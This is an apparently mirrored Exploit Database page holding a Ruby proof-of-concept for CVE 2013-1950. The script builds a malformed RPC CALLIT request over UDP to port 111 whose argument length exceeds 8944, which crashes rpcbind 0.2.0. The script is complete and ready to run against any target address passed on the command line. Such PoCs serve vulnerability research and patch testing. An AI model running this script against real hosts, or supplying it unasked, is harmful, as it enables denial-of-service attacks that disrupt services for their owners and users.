rpcbind – CALLIT procedure UDP Crash (PoC)

• Exploit Database
• 12 阅读

• 作者： Sean Verity
  日期： 2013-07-16
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/26887/

• #!/usr/bin/ruby
  #
  #	rpcbind_udp_crash_poc.rb
  #	07/15/2013
  #	Sean Verity <veritysr1980 [at] gmail.com>
  #	CVE 2013-1950
  #
  #	rpcbind (CALLIT Procedure) UDP Crash PoC
  #	Affected Software Package: rpcbind-0.2.0-19
  #
  #	Tested on: 
  #	Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) 
  #	CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
  #
  #	rpcbind can be crashed by setting the argument length 
  #	value > 8944 in an RPC CALLIT procedure request over UDP.
  #
  
  require 'socket'
  
  def usage
  	abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
  end
  
  if ARGV.length == 1
  	pkt = [rand(2**32)].pack('N')	# XID
  	pkt << [0].pack('N')			# Message Type: CALL (0)
  	pkt << [2].pack('N')			# RPC Version: 2
  	pkt << [100000].pack('N')		# Program: Portmap (100000)
  	pkt << [2].pack('N')			# Program Version: 2
  	pkt << [5].pack('N')			# Procedure: CALLIT (5)
  	pkt << [0].pack('N')			# Credentials Flavor: AUTH_NULL (0)
  	pkt << [0].pack('N')			# Length: 0
  	pkt << [0].pack('N')			# Credentials Verifier: AUTH_NULL (0)
  	pkt << [0].pack('N')			# Length: 0
  	pkt << [0].pack('N')			# Program: Unknown (0) 
  	pkt << [1].pack('N')			# Version: 1
  	pkt << [1].pack('N')			# Procedure: 1
  	pkt << [8945].pack('N')			# Argument Length
  	pkt << "crash"					# Arguments
  
  	s = UDPSocket.new
  	s.send(pkt, 0, ARGV[0], 111)
  else
  	usage
  end